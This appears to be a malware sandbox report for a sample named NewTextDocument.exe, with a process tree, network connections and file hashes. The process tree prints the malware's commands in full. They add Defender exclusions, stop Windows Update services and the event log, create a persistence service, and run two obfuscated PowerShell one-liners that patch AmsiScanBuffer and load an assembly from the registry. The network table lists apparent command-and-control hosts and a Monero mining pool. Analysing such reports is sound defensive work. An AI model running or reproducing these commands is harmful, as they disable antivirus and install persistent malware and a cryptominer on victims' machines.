C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe
"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
"C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
"C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe
"C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "KPNEMLWP"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "KPNEMLWP" binpath= "C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YzbKDlkEvoiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NOOBoIueVBTvCZ,[Parameter(Position=1)][Type]$mPhNQzYMLi)$bYTABmYnzBr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+'e'+'','Class,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$bYTABmYnzBr.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+'e'+[Char](100)+'');$bYTABmYnzBr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+'',$mPhNQzYMLi,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $bYTABmYnzBr.CreateType();}$mROtnFNlpOpQK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'icro'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+'eNat'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'h'+[Char](111)+'ds');$cjamcBWbUeiYFp=$mROtnFNlpOpQK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lTtkaEbeIUFkELaNQrp=YzbKDlkEvoiP @([String])([IntPtr]);$tpTTDPrIyYPNIvxmSXsCEV=YzbKDlkEvoiP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NJCFRmWYWIl=$mROtnFNlpOpQK.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$GxoauuZqFwPXeM=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$mpuImyzxFAXRXzNMp=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$NJCFRmWYWIl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FjxjzMf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxoauuZqFwPXeM,$lTtkaEbeIUFkELaNQrp).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+'l'+'');$zHBcEpfJFRcJRExQE=$cjamcBWbUeiYFp.Invoke($Null,@([Object]$FjxjzMf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$MHjpcMCHxx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,4,[ref]$MHjpcMCHxx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zHBcEpfJFRcJRExQE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mpuImyzxFAXRXzNMp,$tpTTDPrIyYPNIvxmSXsCEV).Invoke($zHBcEpfJFRcJRExQE,[uint32]8,0x20,[ref]$MHjpcMCHxx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "KPNEMLWP"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe
C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
"C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qwLHkZXFzmKZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ympiCVUcQUIwPw,[Parameter(Position=1)][Type]$dqXuQKUBhK)$fhOoLHkPBqO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+'y'+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+'s'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fhOoLHkPBqO.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ympiCVUcQUIwPw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$fhOoLHkPBqO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$dqXuQKUBhK,$ympiCVUcQUIwPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'im'+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $fhOoLHkPBqO.CreateType();}$aYDMhNBIxCkso=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+'Meth'+'o'+'d'+[Char](115)+'');$ERyGLMwEoOOMVT=$aYDMhNBIxCkso.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JeoiWKxHehfHbSHWDxh=qwLHkZXFzmKZ @([String])([IntPtr]);$cvINplqKeNJvCwMsndbxTK=qwLHkZXFzmKZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$baolUOiMTkB=$aYDMhNBIxCkso.GetMethod(''+'G'+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'and'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.d'+'l'+'l')));$rEXqfKPFSSNJzN=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+'y'+'A')));$rZORpBmFhgNwfTkSc=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$baolUOiMTkB,[Object](''+'V'+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+'a'+'lPr'+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$KFTLLdl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rEXqfKPFSSNJzN,$JeoiWKxHehfHbSHWDxh).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+[Char](46)+'dl'+'l'+'');$WxBGdKhFwpzftvLjL=$ERyGLMwEoOOMVT.Invoke($Null,@([Object]$KFTLLdl,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+'r')));$SMIhvkSHmK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,4,[ref]$SMIhvkSHmK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WxBGdKhFwpzftvLjL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rZORpBmFhgNwfTkSc,$cvINplqKeNJvCwMsndbxTK).Invoke($WxBGdKhFwpzftvLjL,[uint32]8,0x20,[ref]$SMIhvkSHmK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('d'+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad13a311-2a06-4d5b-a28d-c2c488daadcb}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{baac7772-f4f1-4c81-bef4-89a906e4264d}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| UA | 185.156.72.2:80 | 185.156.72.2 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | waxnps.live | udp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| BG | 195.82.147.188:443 | waxnps.live | tcp |
| US | 154.53.41.5:80 | 154.53.41.5 | tcp |
| KR | 218.236.59.183:47006 | 218.236.59.183 | tcp |
| US | 8.8.8.8:53 | battlefled.top | udp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| BG | 195.82.147.188:443 | battlefled.top | tcp |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 152.53.121.6:10128 | gulf.moneroocean.stream | tcp |
| US | 154.53.41.5:1144 | tcp | |
| US | 8.8.8.8:53 | peeweelittleweeny.lol | udp |
| GB | 198.38.90.19:443 | peeweelittleweeny.lol | tcp |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.27.94:80 | c.pki.goog | tcp |
| GB | 198.38.90.19:443 | peeweelittleweeny.lol | tcp |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp | |
| US | 154.53.41.5:1144 | tcp |
Files
memory/5500-0-0x00007FFBC8DD3000-0x00007FFBC8DD5000-memory.dmp
memory/5500-1-0x0000000000740000-0x0000000000748000-memory.dmp
memory/5500-2-0x00007FFBC8DD0000-0x00007FFBC9891000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe
| MD5 | a4800db4a176fdba6d86bde9e21d7d4b |
| SHA1 | c927378fd0aff61a865860b81ea49182ad3fc896 |
| SHA256 | 4738fee480de92666fc5cb7e6c9a4b0d97cd3d3b7ff9d642288e0cc604d407ae |
| SHA512 | cbcecf64126f92844858213e7050942c63cbdf23522e1e8ac0887c655c615239bdf4111475a7ebffa4bf700ec59b6a8125fed46201ff2238eb9d8e4c8e4236c6 |
C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe
| MD5 | 45445e04eeaaab44456e4296c25ddb1b |
| SHA1 | 75f242422d7329a0a3f9a1230cf694443601717e |
| SHA256 | 82f77e79a0052160d388738a17a60e3733e439dd6beb53c88232e075ccef7d6e |
| SHA512 | ffde7a5727e67998e09cfa90b8db7ac11f17b815a3c846a0a52cf98962049bdb7da94aa0a74f26977a2797309835fd4638c636a6e9412ddc22746fe39af776a6 |
memory/4768-24-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4768-26-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4768-27-0x0000000000400000-0x000000000045F000-memory.dmp
memory/4768-28-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe
